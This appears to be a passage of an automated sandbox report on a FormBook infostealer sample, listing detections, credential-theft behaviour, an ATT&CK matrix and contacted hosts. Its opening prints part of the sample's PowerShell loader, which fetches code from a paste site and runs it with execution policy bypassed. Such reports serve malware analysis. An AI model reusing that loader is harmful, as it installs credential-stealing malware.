;$modrg += 'gettype( ''misericordiosoamen.class1'' ).getm' ;$modrg += 'ethod( ''msqbiby'' ).invoke( $null , [object[]] ( ''0/trxodz94/r/ee.etsap//:sptth'' , ''c:\windows\system32\purchase okk.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''roda'' ) ) ;' ;$vbwwz = ( [system.io.path]::gettemppath() + 'dll03.ps1' ) ;$modrg | out-file -filepath $vbwwz -force ;powershell -executionpolicy bypass -file $vbwwz ;"Jump to behavior
                  Source: DmMVOWsP1JSI77P.exe, 0000000B.00000002.2229058882.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000000.1183871673.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000000.1337559298.00000000018E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: DmMVOWsP1JSI77P.exe, 0000000B.00000002.2229058882.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000000.1183871673.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000000.1337559298.00000000018E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: DmMVOWsP1JSI77P.exe, 0000000B.00000002.2229058882.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000000.1183871673.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000000.1337559298.00000000018E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: DmMVOWsP1JSI77P.exe, 0000000B.00000002.2229058882.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 0000000B.00000000.1183871673.0000000000E71000.00000002.00000001.00040000.00000000.sdmp, DmMVOWsP1JSI77P.exe, 00000014.00000000.1337559298.00000000018E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2229860985.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2229410762.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2226580404.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1277774749.0000000002860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2229866615.0000000002E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1258834116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1262010486.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.2232234775.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\iexpress.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\SysWOW64\iexpress.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                  Remote Access Functionality

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2229860985.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2229410762.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2226580404.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1277774749.0000000002860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2229866615.0000000002E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1258834116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1262010486.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.2232234775.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information121
                  Scripting                  		Valid Accounts1
                  Exploitation for Client Execution                  		121
                  Scripting                  		1
                  Abuse Elevation Control Mechanism                  		111
                  Deobfuscate/Decode Files or Information                  		1
                  OS Credential Dumping                  		2
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Abuse Elevation Control Mechanism                  		LSASS Memory123
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts11
                  Scheduled Task/Job                  		11
                  Scheduled Task/Job                  		512
                  Process Injection                  		4
                  Obfuscated Files or Information                  		Security Account Manager131
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts4
                  PowerShell                  		Login Hook11
                  Scheduled Task/Job                  		1
                  Software Packing                  		NTDS2
                  Process Discovery                  		Distributed Component Object ModelInput Capture4
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets41
                  Virtualization/Sandbox Evasion                  		SSHKeylogging5
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                  Virtualization/Sandbox Evasion                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job512
                  Process Injection                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1665559 Sample: PURCHASE OKK.vbs Startdate: 15/04/2025 Architecture: WINDOWS Score: 100 65 www.rtprubikslot-asli.xyz 2->65 67 pastebin.com 2->67 69 19 other IPs or domains 2->69 77 Suricata IDS alerts for network traffic 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Yara detected FormBook 2->81 87 9 other signatures 2->87 13 wscript.exe 1 2->13         started        16 svchost.exe 1 1 2->16         started        signatures3 83 Performs DNS queries to domains with low reputation 65->83 85 Connects to a pastebin service (likely for C&C) 67->85 process4 dnsIp5 109 Suspicious powershell command line found 13->109 111 Wscript starts Powershell (via cmd or directly) 13->111 113 Uses schtasks.exe or at.exe to add and modify task schedules 13->113 115 2 other signatures 13->115 19 powershell.exe 7 13->19         started        22 schtasks.exe 1 13->22         started        24 schtasks.exe 1 13->24         started        57 127.0.0.1 unknown unknown 16->57 signatures6 process7 signatures8 89 Suspicious powershell command line found 19->89 91 Encrypted powershell cmdline option found 19->91 93 Bypasses PowerShell execution policy 19->93 95 Found suspicious powershell code related to unpacking or dynamic code loading 19->95 26 powershell.exe 14 18 19->26         started        31 conhost.exe 19->31         started        33 conhost.exe 22->33         started        35 conhost.exe 24->35         started        process9 dnsIp10 71 paste.ee 23.186.113.60, 443, 49694, 49696 KLAYER-GLOBALNL Reserved 26->71 73 pastebin.com 104.22.69.199, 443, 49693, 49695 CLOUDFLARENETUS United States 26->73 55 C:\Users\user\AppData\Local\Temp\dll03.ps1, Unicode 26->55 dropped 107 Potential dropper URLs found in powershell memory 26->107 37 powershell.exe 11 26->37         started        file11 signatures12 process13 signatures14 97 Writes to foreign memory regions 37->97 99 Injects a PE file into a foreign processes 37->99 40 MSBuild.exe 37->40         started        process15 signatures16 101 Maps a DLL or memory area into another process 40->101 43 DmMVOWsP1JSI77P.exe 40->43 injected process17 signatures18 103 Maps a DLL or memory area into another process 43->103 105 Found direct / indirect Syscall (likely to bypass EDR) 43->105 46 iexpress.exe 13 43->46         started        process19 signatures20 117 Tries to steal Mail credentials (via file / registry access) 46->117 119 Tries to harvest and steal browser information (history, passwords, etc) 46->119 121 Modifies the context of a thread in another process (thread injection) 46->121 123 3 other signatures 46->123 49 DmMVOWsP1JSI77P.exe 46->49 injected 53 firefox.exe 46->53         started        process21 dnsIp22 59 www.samlib.ru 81.176.66.171, 49724, 80 RTCOMM-ASRU Russian Federation 49->59 61 reviewsonline.shop 84.32.84.32, 49958, 49964, 49965 NTT-LT-ASLT Lithuania 49->61 63 4 other IPs or domains 49->63 75 Found direct / indirect Syscall (likely to bypass EDR) 49->75 signatures23

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.